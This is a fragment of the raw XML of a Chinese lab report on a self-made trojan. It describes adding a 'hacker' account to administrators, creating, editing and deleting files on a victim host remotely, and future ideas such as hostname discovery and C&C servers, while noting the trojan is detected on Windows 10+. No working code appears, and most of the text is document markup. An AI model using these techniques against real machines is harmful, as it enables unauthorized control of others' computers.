            <wp:effectExtent l="0" t="0" r="14605" b="1905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3.将hacker用户增加到管理员</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3744595"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445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3.4进行主机内文件的增删改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1.首先建立一个test文档，攻击机dir可以查看内部内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2882900" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="12700" b="5715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75535" cy="2181225"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13335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7553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进行xiezi.txt.doc的编辑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可以发现，原本type xiezi.txt.doc查看内部内容，什么都没有；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通过命令行输入hello owner之后，写字板内部出现了如下字样。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3021330" cy="1577340"/>
            <wp:effectExtent l="0" t="0" r="11430" b="7620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133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36775" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:docPr id="2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3677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3.进行xiezi.txt.doc的删除</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3013710" cy="2202815"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="2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28215" cy="2106295"/>
            <wp:effectExtent l="0" t="0" r="12065" b="12065"/>
            <wp:docPr id="2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4评估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4.1没有进行被攻击IP的查看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通过Windows API：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使用Windows API函数GetComputerName来获取主机名。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通过网络扫描：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恶意软件可以使用内置的网络扫描功能来发现局域网内的其他主机，并获取它们的主机名。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通过配置文件或命令和控制（C&amp;C）服务器：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有些恶意软件会连接到攻击者的C&amp;C服务器，服务器会发送目标主机的IP地址或主机名给恶意软件。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4.2不能够迁移到windows10+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这个木马程序不能被迁移到windows10以上的电脑，会被识别并不允许下载。有待后续的开发。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7BA7C7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="807BA7C7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimalFullWidth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A36EEEAC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A36EEEA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3D38995"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B3D3899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B6B74490"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B6B7449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F7092BB2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F7092B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B56070D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6B56070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c0NTRhZTdkYzY2N2ZkZmQ0Nzc1MTgxOTUwMTU0ZmYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="05B416E8"/>
    <w:rsid w:val="0A5D5C73"/>
    <w:rsid w:val="0C277F96"/>
    <w:rsid w:val="118D2AB0"/>
    <w:rsid w:val="13962705"/>
    <w:rsid w:val="29621A74"/>
    <w:rsid w:val="29CB7425"/>
    <w:rsid w:val="505A4F8A"/>
    <w:rsid w:val="544F375A"/>
    <w:rsid w:val="5672170E"/>
    <w:rsid w:val="5D687659"/>
    <w:rsid w:val="614B7B2E"/>
    <w:rsid w:val="65907C77"/>
    <w:rsid w:val="68416799"/>
    <w:rsid w:val="6B883AAC"/>
    <w:rsid w:val="6DAB4FF7"/>
    <w:rsid w:val="767B0330"/>
    <w:rsid w:val="78631635"/>
    <w:rsid w:val="7AA75DB5"/>
    <w:rsid w:val="7DA621DB"/>
    <w:rsid w:val="7E20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  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="标题 3 Char"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="0"/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table" w:customStyle="1" w:styleId="12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3">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体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3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2666</Words>
  <Characters>5081</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>61</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5446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2019-12-12T12:44:00Z</dcterms:created>
  <dc:creator>咕咕</dc:creator>
  <cp:lastModifiedBy>冰儿.</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-17T05:40:56Z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CFDCC9D4EE294B9D81F86B547F80B6F2_11</vt:lpwstr>
  </property>
</Properties>
</file>